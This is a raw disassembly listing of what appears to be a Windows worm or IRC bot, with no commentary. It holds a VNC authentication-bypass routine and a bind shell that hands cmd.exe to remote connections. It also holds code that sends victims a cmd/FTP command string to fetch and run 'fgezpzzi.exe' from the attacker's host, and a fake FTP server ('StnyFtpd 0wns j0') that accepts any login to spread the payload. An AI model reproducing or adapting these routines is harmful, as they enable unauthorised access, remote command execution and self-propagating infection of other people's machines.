; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E9FB proc near ; CODE XREF: sub_40EAE9+91�p
var_5A0 = byte ptr -5A0h
Dest = byte ptr -1A0h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
push ebp
mov ebp, esp
sub esp, 5A0h
push ebx
push esi
push edi
xor esi, esi
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+arg_4]
mov [ebp+Dst], 2
push eax
call ds:dword_4271F0 ; inet_addr
push [ebp+arg_BC]
mov [ebp+var_C], eax
call ds:dword_4271F4 ; htons
push esi
push 1
push 2
mov [ebp+var_E], ax
call ds:dword_427204 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_40EAC9
lea eax, [ebp+Dst]
push 10h
push eax
push ebx
call ds:dword_4271F8 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_40EAC9
mov edi, 400h
push esi
mov esi, ds:dword_4271FC
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
mov eax, offset Str ; "fgezpzzi.exe"
push eax
push eax
push dword_4CB710
push [ebp+arg_0]
call sub_40AA06
pop ecx
push eax
push offset aCmdCEchoOpen_0 ; "cmd /c echo open %s %d >> ii &echo user"...
lea eax, [ebp+Dest]
push 190h ; Count
push eax ; Dest
call __snprintf
add esp, 1Ch
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push ebx
call ds:dword_427208 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40EACD
loc_40EAC9: ; CODE XREF: sub_40E9FB+50�j
; sub_40E9FB+62�j
xor eax, eax
jmp short loc_40EAE4
; ---------------------------------------------------------------------------
loc_40EACD: ; CODE XREF: sub_40E9FB+CC�j
push 0
lea eax, [ebp+var_5A0]
push edi
push eax
push ebx
call esi ; recv
push ebx
call ds:dword_427200 ; closesocket
push 1
pop eax
loc_40EAE4: ; CODE XREF: sub_40E9FB+D0�j
pop edi
pop esi
pop ebx
leave
retn
sub_40E9FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EAE9 proc near ; CODE XREF: sub_40C3E8+1EA�p
; DATA XREF: .data:off_4317FC�o
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = byte ptr 8
arg_4 = byte ptr 0Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
push ebp
mov ebp, esp
sub esp, 10h
push esi
lea eax, [ebp+arg_4]
push edi
push eax
mov [ebp+var_10], 2
call dword_4CBA14 ; inet_addr
push [ebp+arg_A0]
mov [ebp+var_C], eax
call dword_4CB9D4 ; htons
push 6
push 1
push 2
mov [ebp+var_E], ax
call ds:dword_427204 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40EB5B
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call ds:dword_4271F8 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40EB3C
push esi
jmp short loc_40EB55
; ---------------------------------------------------------------------------
loc_40EB3C: ; CODE XREF: sub_40EAE9+4E�j
push 0
push 1213h
push offset dword_433424
push esi
call ds:dword_427208 ; send
cmp eax, 0FFFFFFFFh
push esi
jnz short loc_40EB5F
loc_40EB55: ; CODE XREF: sub_40EAE9+51�j
call ds:dword_427200 ; closesocket
loc_40EB5B: ; CODE XREF: sub_40EAE9+3C�j
xor eax, eax
jmp short loc_40EBA1
; ---------------------------------------------------------------------------
loc_40EB5F: ; CODE XREF: sub_40EAE9+6A�j
call ds:dword_427200 ; closesocket
push 216Bh
lea esi, [ebp+arg_0]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40E9FB
add esp, 0C0h
test eax, eax
jz short loc_40EB9E
mov eax, [ebp+arg_A8]
shl eax, 6
inc dword_431800[eax]
lea eax, dword_431800[eax]
loc_40EB9E: ; CODE XREF: sub_40EAE9+9E�j
push 1
pop eax
loc_40EBA1: ; CODE XREF: sub_40EAE9+74�j
pop edi
pop esi
leave
retn
sub_40EAE9 endp
; =============== S U B R O U T I N E =======================================
sub_40EBA5 proc near ; CODE XREF: .text:0040EC93�p
; .text:0040ECF5�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_8]
xor esi, esi
loc_40EBAD: ; CODE XREF: sub_40EBA5+2D�j
test edi, edi
jle short loc_40EBD8
mov eax, [esp+8+arg_4]
push 0
add eax, esi
push edi
push eax
push [esp+14h+arg_0]
call dword_4CB9EC ; recv
test eax, eax
jz short loc_40EBD4
cmp eax, 0FFFFFFFFh
jz short loc_40EBD4
sub edi, eax
add esi, eax
jmp short loc_40EBAD
; ---------------------------------------------------------------------------
loc_40EBD4: ; CODE XREF: sub_40EBA5+22�j
; sub_40EBA5+27�j
xor eax, eax
jmp short loc_40EBDB
; ---------------------------------------------------------------------------
loc_40EBD8: ; CODE XREF: sub_40EBA5+A�j
push 1
pop eax
loc_40EBDB: ; CODE XREF: sub_40EBA5+31�j
pop edi
pop esi
retn
sub_40EBA5 endp
; =============== S U B R O U T I N E =======================================
sub_40EBDE proc near ; CODE XREF: .text:0040ECDF�p
; .text:0040ED0C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_40EC1B
xor esi, esi
test edi, edi
jle short loc_40EC15
loc_40EBEE: ; CODE XREF: sub_40EBDE+35�j
mov eax, edi
push 0
sub eax, esi
push eax
mov eax, [esp+10h+arg_4]
add eax, esi
push eax
push [esp+14h+arg_0]
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40EC1B
test eax, eax
jz short loc_40EC1B
add esi, eax
cmp esi, edi
jl short loc_40EBEE
loc_40EC15: ; CODE XREF: sub_40EBDE+E�j
push 1
pop eax
loc_40EC18: ; CODE XREF: sub_40EBDE+3F�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_40EC1B: ; CODE XREF: sub_40EBDE+8�j
; sub_40EBDE+2B�j ...
xor eax, eax
jmp short loc_40EC18
sub_40EBDE endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 24Ch
push ebx
mov ax, word_4346DC
push esi
push edi
push 0
push 1
push 2
mov [ebp-2], ax
pop esi
push esi
call dword_4CBA54 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_40EC4D
push eax
jmp short loc_40EC81
; ---------------------------------------------------------------------------
loc_40EC4D: ; CODE XREF: .text:0040EC48�j
lea eax, [ebp+0Ch]
push eax
call dword_4CBA14 ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-48h], eax
mov [ebp-4Ch], si
call dword_4CB9D4 ; htons
mov [ebp-4Ah], ax
lea eax, [ebp-4Ch]
push 10h
push eax
push ebx
call dword_4CB97C ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40EC8C
push ebx
loc_40EC81: ; CODE XREF: .text:0040EC4B�j
call dword_4CBA6C ; closesocket
jmp loc_40EE87
; ---------------------------------------------------------------------------
loc_40EC8C: ; CODE XREF: .text:0040EC7E�j
lea eax, [ebp-38h]
push 0Ch
push eax
push ebx
call sub_40EBA5
add esp, 0Ch
test eax, eax
jz loc_40EE80
lea eax, [ebp-20h]
and byte ptr [ebp-2Ch], 0
push eax
lea eax, [ebp-28h]
push eax
lea eax, [ebp-38h]
push offset aRfb03d_03d ; "RFB %03d.%03d\n"
push eax
call _sscanf
add esp, 10h
cmp eax, esi
jnz loc_40EE80
cmp dword ptr [ebp-28h], 3
jz short loc_40ECD8
cmp dword ptr [ebp-20h], 8
jnz loc_40EE80
loc_40ECD8: ; CODE XREF: .text:0040ECCC�j
lea eax, [ebp-38h]
push 0Ch
push eax
push ebx
call sub_40EBDE
add esp, 0Ch
test eax, eax
jz loc_40EE80
lea eax, [ebp-3Ch]
push esi
push eax
push ebx
call sub_40EBA5
add esp, 0Ch
test eax, eax
jz loc_40EE80
lea eax, [ebp-2]
push 1
push eax
push ebx
call sub_40EBDE
add esp, 0Ch
test eax, eax
jz loc_40EE80
lea eax, [ebp-24h]
push 4
push eax
push ebx
call sub_40EBA5
add esp, 0Ch
test eax, eax
jz loc_40EE80
mov eax, [ebp-24h]
mov edi, 0FF0000h
mov ecx, eax
mov edx, eax
and ecx, edi
mov esi, 0FF00h
shr edx, 10h
or ecx, edx
mov edx, eax
shl edx, 10h
and eax, esi
or edx, eax
shr ecx, 8
shl edx, 8
or ecx, edx
mov [ebp-24h], ecx
jnz loc_40EE80
push 1
push offset word_4CB88C
push ebx
call sub_40EBDE
add esp, 0Ch
test eax, eax
jz loc_40EE80
lea eax, [ebp-1Ch]
push 18h
push eax
push ebx
call sub_40EBA5
add esp, 0Ch
test eax, eax
jz loc_40EE80
xor eax, eax
mov ecx, [ebp-8]
mov al, [ebp-1Bh]
mov edx, ecx
mov ah, [ebp-1Ch]
mov [ebp-1Ch], ax
xor eax, eax
mov al, [ebp-19h]
mov ah, [ebp-1Ah]
mov [ebp-1Ah], ax
xor eax, eax
mov al, [ebp-13h]
mov ah, [ebp-14h]
mov [ebp-14h], ax
xor eax, eax
mov al, [ebp-11h]
mov ah, [ebp-12h]
mov [ebp-12h], ax
xor eax, eax
mov al, [ebp-0Fh]
mov ah, [ebp-10h]
mov [ebp-10h], ax
mov eax, ecx
and eax, edi
shr edx, 10h
or eax, edx
mov edx, ecx
shl edx, 10h
and ecx, esi
or edx, ecx
shr eax, 8
shl edx, 8
or eax, edx
mov [ebp-8], eax
add eax, 2
push eax
call ??2@YAPAXI@Z ; operator new(uint)
mov edi, [ebp-8]
pop ecx
test edi, edi
mov esi, eax
jle short loc_40EE10
push edi
push esi
push ebx
call sub_40EBA5
add esp, 0Ch
loc_40EE10: ; CODE XREF: .text:0040EE03�j
and byte ptr [edi+esi], 0
lea eax, [ebp+0Ch]
push eax
push esi
push dword ptr [ebp-20h]
lea eax, [ebp-24Ch]
push dword ptr [ebp-28h]
push offset aVncD_DSSAuthby ; "VNC%d.%d %s: %s - [AuthBypass]"
push 200h
push eax
call __snprintf
push 0
lea eax, [ebp-24Ch]
push dword ptr [ebp+0B8h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_409869
lea eax, [ebp-24Ch]
push eax
call sub_415D38
mov eax, [ebp+0B0h]
add esp, 34h
shl eax, 6
inc dword_431800[eax]
push ebx
lea eax, dword_431800[eax]
call ds:dword_427200 ; closesocket
push 1
pop eax
jmp short loc_40EE89
; ---------------------------------------------------------------------------
loc_40EE80: ; CODE XREF: .text:0040EC9D�j
; .text:0040ECC2�j ...
push ebx
call ds:dword_427200 ; closesocket
loc_40EE87: ; CODE XREF: .text:0040EC87�j
xor eax, eax
loc_40EE89: ; CODE XREF: .text:0040EE7E�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40EE8E proc near ; DATA XREF: sub_40EF1C+15B�o
var_404 = byte ptr -404h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 404h
loc_40EE97: ; CODE XREF: sub_40EE8E+25�j
; sub_40EE8E+41�j
push 0
lea eax, [ebp+var_404]
push 400h
push eax
push dword_4CE708
call dword_4CB9EC ; recv
test eax, eax
jle short loc_40EE97
lea ecx, [ebp+var_4]
push 0
push ecx
push eax
lea eax, [ebp+var_404]
push eax
push dword_4CE704
call ds:dword_4270F0 ; WriteFile
jmp short loc_40EE97
sub_40EE8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40EED1 proc near ; DATA XREF: sub_40EF1C+142�o
var_404 = byte ptr -404h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 404h
loc_40EEDA: ; CODE XREF: sub_40EED1+2F�j
; sub_40EED1+49�j
lea eax, [ebp+var_4]
and [ebp+var_4], 0
push 0
push eax
lea eax, [ebp+var_404]
push 400h
push eax
push dword_4CE6F8
call ds:dword_4270EC ; ReadFile
cmp [ebp+var_4], 0
jle short loc_40EEDA
push 0
lea eax, [ebp+var_404]
push [ebp+var_4]
push eax
push dword_4CE708
call dword_4CBA24 ; send
jmp short loc_40EEDA
sub_40EED1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40EF1C proc near ; DATA XREF: sub_401ACD+2CCA�o
var_11C = byte ptr -11Ch
var_98 = dword ptr -98h
var_7C = dword ptr -7Ch
var_50 = dword ptr -50h
var_4C = word ptr -4Ch
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = byte ptr -3Ch
Dst = word ptr -38h
var_36 = word ptr -36h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 28h
mov esi, eax
pop ecx
lea edi, [ebp+var_11C]
rep movsd
push 1
xor edi, edi
pop esi
mov [eax+98h], esi
push 10h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_98]
call dword_4CB9D4 ; htons
push 6
push esi
push 2
mov [ebp+var_36], ax
call dword_4CBA54 ; socket
mov [ebp+arg_0], eax
lea eax, [ebp+Dst]
push 10h
push eax
push [ebp+arg_0]
call dword_4CBA00 ; bind
push 5
push [ebp+arg_0]
call dword_4CB9FC ; listen
mov ebx, ds:dword_427108
mov esi, ds:dword_427070
loc_40EF9C: ; CODE XREF: sub_40EF1C+1CB�j
push edi
push edi
push [ebp+arg_0]
call dword_4CBA68 ; accept
mov dword_4CE708, eax
lea eax, [ebp+var_C]
push edi
push eax
push offset dword_4CE704
push offset dword_4CE700
mov [ebp+var_C], 0Ch
mov [ebp+var_4], 1
mov [ebp+var_8], edi
call ebx ; CreatePipe
lea eax, [ebp+var_C]
push edi
push eax
push offset dword_4CE6FC
push offset dword_4CE6F8
call ebx ; CreatePipe
push 44h ; Size
lea eax, [ebp+var_7C]
push edi ; Val
push eax ; Dst
call _memset
mov eax, dword_4CE700
add esp, 0Ch
mov [ebp+var_44], eax
mov eax, dword_4CE6FC
mov [ebp+var_40], eax
push edi
push 1
lea eax, [ebp+var_3C]
push 2
push eax
mov [ebp+var_7C], 44h
mov [ebp+var_50], 101h
mov [ebp+var_4C], di
call ds:dword_427104 ; GetCurrentProcess
push eax
push dword_4CE6FC
call ds:dword_427104 ; GetCurrentProcess
push eax
call ds:dword_427100 ; DuplicateHandle
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_7C]
push eax
push edi
push edi
push 4000090h
lea eax, [ebp+var_C]
push 1
push eax
lea eax, [ebp+var_C]
push eax
push offset aCmd_exe ; "cmd.exe"
push edi
call ds:dword_427074 ; CreateProcessA
lea eax, [ebp+var_18]
push eax
push edi
push edi
push offset sub_40EED1
lea eax, [ebp+var_C]
push edi
push eax
call ds:dword_427084 ; CreateThread
mov [ebp+var_14], eax
lea eax, [ebp+var_18]
push eax
push edi
push edi
push offset sub_40EE8E
lea eax, [ebp+var_C]
push edi
push eax
call ds:dword_427084 ; CreateThread
push 0FFFFFFFFh
mov [ebp+var_10], eax
push [ebp+var_28]
call ds:dword_4270A8 ; WaitForSingleObject
push edi
push [ebp+var_10]
call ds:dword_4270B4 ; TerminateThread
push edi
push [ebp+var_14]
call ds:dword_4270B4 ; TerminateThread
push [ebp+var_10]
call esi ; CloseHandle
push [ebp+var_14]
call esi ; CloseHandle
push edi
push [ebp+var_28]
call ds:dword_4270FC ; TerminateProcess
push dword_4CE700
call esi ; CloseHandle
push dword_4CE704
call esi ; CloseHandle
push dword_4CE6F8
call esi ; CloseHandle
push dword_4CE6FC
call esi ; CloseHandle
push [ebp+var_24]
call esi ; CloseHandle
push [ebp+var_28]
call esi ; CloseHandle
jmp loc_40EF9C
sub_40EF1C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40F0EC proc near ; DATA XREF: .data:0042900C�o
jmp $+5
sub_40F0EC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40F0F1 proc near
push 0FFFEh
push 400h
call sub_418BD1
pop ecx
mov dword_4CE710, eax
pop ecx
retn
sub_40F0F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F108 proc near ; DATA XREF: sub_40BD91+34D�o
Dest = byte ptr -6C0h
var_2C0 = dword ptr -2C0h
var_C0 = byte ptr -0C0h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A4 = dword ptr -0A4h
Str = byte ptr -0A0h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
Dst = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 6C0h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 27h
mov esi, eax
pop ecx
lea edi, [ebp+var_B0]
rep movsd
push 1
xor ebx, ebx
pop esi
mov [eax+98h], esi
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_A4]
call dword_4CB9D4 ; htons
push ebx
push esi
push 2
mov [ebp+var_12], ax
mov [ebp+var_10], ebx
call dword_4CBA54 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jnz short loc_40F1AF
cmp [ebp+var_1C], ebx
jnz short loc_40F18F
push ebx ; int
lea eax, [ebp+var_2C0]
push [ebp+var_20] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_B0] ; int
call sub_409869
add esp, 14h
loc_40F18F: ; CODE XREF: sub_40F108+65�j
lea eax, [ebp+var_2C0]
push eax
call sub_415D38
push [ebp+var_AC]
call sub_40B6D6
pop ecx
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_40F1AF: ; CODE XREF: sub_40F108+60�j
mov eax, [ebp+var_AC]
push 10h
imul eax, 234h
mov dword_43E91C[eax], edi
lea eax, [ebp+Dst]
push eax
push edi
call dword_4CBA00 ; bind
cmp eax, esi
mov ebx, 400h
jnz loc_40F2AA
call dword_4CB968 ; WSAGetLastError
cmp eax, 2740h
jz short loc_40F22F
xor esi, esi
cmp [ebp+var_1C], esi
jnz short loc_40F20F
push esi ; int
lea eax, [ebp+var_2C0]
push [ebp+var_20] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_B0] ; int
call sub_409869
add esp, 14h
loc_40F20F: ; CODE XREF: sub_40F108+E5�j
lea eax, [ebp+var_2C0]
push eax
call sub_415D38
push [ebp+var_AC]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
loc_40F22F: ; CODE XREF: sub_40F108+DE�j
push 0FFFEh
push ebx
call sub_418BD1
pop ecx
mov dword_4CE710, eax
pop ecx
mov [ebp+var_12], ax
lea eax, [ebp+Dst]
push 10h
push eax
push edi
call dword_4CBA00 ; bind
cmp eax, esi
jnz short loc_40F2AA
call dword_4CB968 ; WSAGetLastError
xor esi, esi
cmp [ebp+var_1C], esi
jnz short loc_40F28A
cmp eax, 2740h
jz short loc_40F28A
push esi ; int
lea eax, [ebp+var_2C0]
push [ebp+var_20] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_B0] ; int
call sub_409869
add esp, 14h
loc_40F28A: ; CODE XREF: sub_40F108+159�j
; sub_40F108+160�j
lea eax, [ebp+var_2C0]
push eax
call sub_415D38
push [ebp+var_AC]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
loc_40F2AA: ; CODE XREF: sub_40F108+CD�j
; sub_40F108+14C�j
push 5
push edi
call dword_4CB9FC ; listen
cmp eax, esi
jz loc_40F38F
mov [ebp+var_4], 10h
mov esi, offset Str ; "fgezpzzi.exe"
loc_40F2C7: ; CODE XREF: sub_40F108+1D7�j
; sub_40F108+227�j ...
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_C0]
push eax
push edi
call dword_4CBA68 ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_40F2C7
cmp [ebp+var_1C], 0
jnz short loc_40F308
push 0 ; int
lea eax, [ebp+var_2C0]
push [ebp+var_20] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_B0] ; int
call sub_409869
add esp, 14h
loc_40F308: ; CODE XREF: sub_40F108+1DD�j
lea eax, [ebp+var_2C0]
push eax
call sub_415D38
pop ecx
lea eax, [ebp+var_2C0]
push 0
push 200h
push eax
push [ebp+arg_0]
call dword_4CB9EC ; recv
cmp eax, 0FFFFFFFFh
jz short loc_40F2C7
push esi
push esi
push dword_4CB710
push [ebp+var_B0]
call sub_40AA06
pop ecx
push eax
push offset aEchoOpenSDOE_0 ; "echo open %s %d >> o&echo user 1 >>o &e"...
lea eax, [ebp+Dest]
push ebx ; Count
push eax ; Dest
call __snprintf
add esp, 1Ch
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push [ebp+arg_0]
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz loc_40F2C7
inc dword_4CE718
jmp loc_40F2C7
; ---------------------------------------------------------------------------
loc_40F38F: ; CODE XREF: sub_40F108+1AD�j
push edi
call dword_4CBA6C ; closesocket
push [ebp+var_AC]
call sub_40B6D6
pop ecx
push 0
call ds:dword_4270D4 ; ExitThread
sub_40F108 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F3AA proc near ; DATA XREF: sub_40BD91+22A�o
var_A70 = byte ptr -0A70h
var_8E0 = dword ptr -8E0h
var_6E0 = dword ptr -6E0h
var_4C8 = byte ptr -4C8h
var_448 = dword ptr -448h
var_444 = dword ptr -444h
var_43C = dword ptr -43Ch
var_338 = byte ptr -338h
var_2D4 = byte ptr -2D4h
Dst = byte ptr -2A0h
var_23C = byte ptr -23Ch
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
Str = byte ptr -128h
Dest = byte ptr -0FCh
var_C8 = byte ptr -0C8h
Str1 = byte ptr -0B0h
var_4C = byte ptr -4Ch
var_3C = word ptr -3Ch
var_3A = word ptr -3Ah
var_38 = dword ptr -38h
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A70h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 1
mov ecx, 0A9h
mov esi, eax
lea edi, [ebp+var_6E0]
pop ebx
rep movsd
mov [eax+2A0h], ebx
lea eax, [ebp+var_A70]
xor esi, esi
push eax
push 101h
mov [ebp+var_28], ebx
mov [ebp+var_20], ebx
mov [ebp+var_18], ebx
mov [ebp+var_22C], esi
mov [ebp+var_43C], esi
call ds:dword_4271D8 ; WSAStartup
push esi
push ebx
push 2
call ds:dword_427204 ; socket
mov esi, ds:dword_4271DC
lea ecx, [ebp+var_28]
push 4
push ecx
mov edi, 0FFFFh
push 4
push edi
push eax
mov [ebp+var_8], eax
call esi ; setsockopt
lea eax, [ebp+var_20]
push 4
push eax
push 0FFFFFFFBh
push edi
mov edi, [ebp+var_8]
push edi
call esi ; setsockopt
lea eax, [ebp+var_18]
push eax
push 8004667Eh
push edi
call ds:dword_4271E0 ; ioctlsocket
mov ax, word ptr dword_4CB710
and [ebp+var_38], 0
push eax
mov [ebp+var_3C], 2
call dword_4CB9D4 ; htons
mov [ebp+var_3A], ax
lea eax, [ebp+var_3C]
push 10h
push eax
push edi
call ds:dword_4271E4 ; bind
test eax, eax
jge short loc_40F470
mov eax, ebx
jmp loc_40F9B8
; ---------------------------------------------------------------------------
loc_40F470: ; CODE XREF: sub_40F3AA+BD�j
push 0Ah
push edi
call ds:dword_4271E8 ; listen
mov [ebp+var_22C], ebx
mov ebx, ds:dword_427208
mov [ebp+var_228], edi
mov [ebp+var_4], edi
loc_40F48E: ; CODE XREF: sub_40F3AA+11D�j
; sub_40F3AA+606�j
push 41h
lea esi, [ebp+var_22C]
pop ecx
lea edi, [ebp+var_43C]
rep movsd
xor esi, esi
lea eax, [ebp+var_43C]
push esi
push esi
push esi
push eax
mov eax, [ebp+var_4]
inc eax
push eax
call ds:dword_42720C ; select
cmp eax, 0FFFFFFFFh
jz loc_40F9B5
xor edi, edi
cmp [ebp+var_4], esi
mov [ebp+arg_0], edi
jl short loc_40F48E
loc_40F4C9: ; CODE XREF: sub_40F3AA+600�j
xor esi, esi
push 64h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
push 64h ; Size
lea eax, [ebp+Str1]
push esi ; Val
push eax ; Dst
call _memset
add esp, 18h
lea eax, [ebp+var_43C]
push eax
push edi
call sub_426350 ; __WSAFDIsSet
test eax, eax
jz loc_40F9A3
cmp edi, [ebp+var_8]
jnz short loc_40F580
lea eax, [ebp+var_10]
mov [ebp+var_10], 10h
push eax
lea eax, [ebp+var_23C]
push eax
push [ebp+var_8]
call ds:dword_4271EC ; accept
cmp eax, 0FFFFFFFFh
jz loc_40F9A3
xor ecx, ecx
cmp [ebp+var_22C], esi
jbe short loc_40F54A
lea edx, [ebp+var_228]
loc_40F53A: ; CODE XREF: sub_40F3AA+19E�j
cmp [edx], eax
jz short loc_40F54A
inc ecx
add edx, 4
cmp ecx, [ebp+var_22C]
jb short loc_40F53A
loc_40F54A: ; CODE XREF: sub_40F3AA+188�j
; sub_40F3AA+192�j
cmp ecx, [ebp+var_22C]
jnz short loc_40F568
cmp [ebp+var_22C], 40h
jnb short loc_40F568
mov [ebp+ecx*4+var_228], eax
inc [ebp+var_22C]
loc_40F568: ; CODE XREF: sub_40F3AA+1A6�j
; sub_40F3AA+1AF�j
cmp eax, [ebp+var_4]
jle short loc_40F570
mov [ebp+var_4], eax
loc_40F570: ; CODE XREF: sub_40F3AA+1C1�j
push esi
push 15h
push offset a220Stnyftpd0wn ; "220 StnyFtpd 0wns j0\n"
push eax
call ebx ; send
jmp loc_40F9A3
; ---------------------------------------------------------------------------
loc_40F580: ; CODE XREF: sub_40F3AA+15A�j
push esi
lea eax, [ebp+Dst]
push 64h
push eax
push edi
call ds:dword_4271FC ; recv
test eax, eax
jg short loc_40F5E7
mov edx, [ebp+var_22C]
xor ecx, ecx
cmp edx, esi
jbe short loc_40F5DB
lea eax, [ebp+var_228]
loc_40F5A7: ; CODE XREF: sub_40F3AA+207�j
cmp [eax], edi
jz short loc_40F5B5
inc ecx
add eax, 4
cmp ecx, edx
jb short loc_40F5A7
jmp short loc_40F5DB
; ---------------------------------------------------------------------------
loc_40F5B5: ; CODE XREF: sub_40F3AA+1FF�j
dec edx
cmp ecx, edx
jnb short loc_40F5D5
lea eax, [ebp+ecx*4+var_228]
loc_40F5C1: ; CODE XREF: sub_40F3AA+229�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov edx, [ebp+var_22C]
add eax, 4
dec edx
cmp ecx, edx
jb short loc_40F5C1
loc_40F5D5: ; CODE XREF: sub_40F3AA+20E�j
dec [ebp+var_22C]
loc_40F5DB: ; CODE XREF: sub_40F3AA+1F5�j
; sub_40F3AA+209�j
push edi
call ds:dword_427200 ; closesocket
jmp loc_40F9A3
; ---------------------------------------------------------------------------
loc_40F5E7: ; CODE XREF: sub_40F3AA+1E9�j
lea eax, [ebp+var_338]
push eax
lea eax, [ebp+Str1]
push eax
lea eax, [ebp+Dst]
push offset aSS_3 ; "%s %s"
push eax ; Src
call _sscanf
lea eax, [ebp+Str1]
push offset aUser_1 ; "USER"
push eax ; Str1
call _strcmp
add esp, 18h
test eax, eax
jnz short loc_40F62B
push esi
push 16h
push offset a331PasswordReq ; "331 Password required\n"
jmp loc_40F6AD
; ---------------------------------------------------------------------------
loc_40F62B: ; CODE XREF: sub_40F3AA+272�j
lea eax, [ebp+Str1]
push offset aPass ; "PASS"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F64C
push esi
push 14h
push offset a230UserLoggedI ; "230 User logged in.\n"
jmp short loc_40F6AD
; ---------------------------------------------------------------------------
loc_40F64C: ; CODE XREF: sub_40F3AA+296�j
lea eax, [ebp+Str1]
push offset aSyst ; "SYST"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F66D
push esi
push 0Dh
push offset a215Stnyftpd ; "215 StnyFtpd\n"
jmp short loc_40F6AD
; ---------------------------------------------------------------------------
loc_40F66D: ; CODE XREF: sub_40F3AA+2B7�j
lea eax, [ebp+Str1]
push offset aRest ; "REST"
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40F68E
push esi
push 10h
push offset a350Restarting_ ; "350 Restarting.\n"
jmp short loc_40F6AD
; ---------------------------------------------------------------------------
loc_40F68E: ; CODE XREF: sub_40F3AA+2D8�j
